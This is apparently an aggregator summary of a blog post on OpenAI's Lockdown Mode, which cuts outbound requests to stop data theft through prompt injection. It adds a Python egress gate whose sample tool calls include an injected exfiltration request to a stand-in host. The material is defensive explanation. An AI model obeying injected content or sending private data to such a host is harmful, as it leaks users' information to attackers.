AIToday

OpenAI's Lockdown Mode rolls out to prevent data theft in prompt injection attacks

Simon Willison's Weblog2d ago1 min read


3 Key Points

1. OpenAI first teased Lockdown Mode in February; it is now live and rolling out to eligible personal accounts (Free, Go, Plus, and Pro) and self-serve ChatGPT Business accounts.

2. Lockdown Mode limits outbound network requests to prevent the final stage of data exfiltration from a prompt injection attack (a technique where malicious instructions embedded in content can alter ChatGPT's behavior). It does not prevent the injection itself from appearing in cached web content or uploaded files.

3. The feature addresses what the article calls the "Lethal Trifecta": when an LLM system has access to private data, exposure to untrusted content, and a way to transmit data back to an attacker. By cutting off the exfiltration vector using deterministic mechanisms not evaluated by AI systems, Lockdown Mode attacks one leg of that attack chain.
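To make the "deterministic mechanism not evaluated by AI" idea concrete, here is an added illustration (not code from Simon Willison's post or from OpenAI, whose internal design is not public): a small egress gate that sits between a model's tool calls and the tools themselves. The tool names, policy class and sample calls are all hypothetical; the point is that the gate is plain code, so it blocks the outbound request regardless of whether a prompt injection convinced the model to make it.

```python
from __future__ import annotations
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hypothetical tools that can move data off the system: the "way to transmit data
# back to an attacker" leg of the lethal trifecta.
EXFIL_CAPABLE_TOOLS = {"web_fetch", "http_post", "send_email"}


@dataclass
class EgressPolicy:
    """Deterministic policy: a pure function of the call and the settings, never of model output."""
    lockdown: bool = False
    allowed_hosts: set[str] = field(default_factory=set)  # consulted only when lockdown is off

    def decide(self, tool_call: dict) -> tuple[bool, str]:
        """Return (allowed, reason) for one tool call emitted by the model."""
        name = tool_call.get("tool")
        if name not in EXFIL_CAPABLE_TOOLS:
            return True, "tool cannot make outbound requests"
        if self.lockdown:
            # Lockdown: every network-capable tool is refused, whatever the URL says.
            return False, "lockdown mode: outbound requests disabled"
        host = urlparse(tool_call.get("args", {}).get("url", "")).hostname or ""
        if host in self.allowed_hosts:
            return True, f"host {host} on allowlist"
        return False, f"host {host!r} not on allowlist"


def run_tool_calls(policy: EgressPolicy, calls: list[dict]) -> list[dict]:
    """Gate every call before execution; a blocked call is logged and never runs."""
    results = []
    for call in calls:
        allowed, reason = policy.decide(call)
        results.append({"tool": call.get("tool"), "allowed": allowed, "reason": reason})
    return results


# Constructed sample of what a model might emit after reading a document that
# contains an injected instruction. The third call is the exfiltration attempt.
SAMPLE_CALLS = [
    {"tool": "read_file", "args": {"path": "notes.txt"}},
    {"tool": "web_fetch", "args": {"url": "https://docs.example.com/api"}},
    {"tool": "web_fetch", "args": {"url": "https://collector.invalid/?d=contents-of-notes"}},
]

if __name__ == "__main__":
    for row in run_tool_calls(EgressPolicy(lockdown=True), SAMPLE_CALLS):
        print(row)
```

With lockdown off, an allowlist still stops the third call; with lockdown on, both fetches are refused before any request is made, which is the trade-off the summary describes (the injection still reaches the model, but the exfiltration step is cut).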
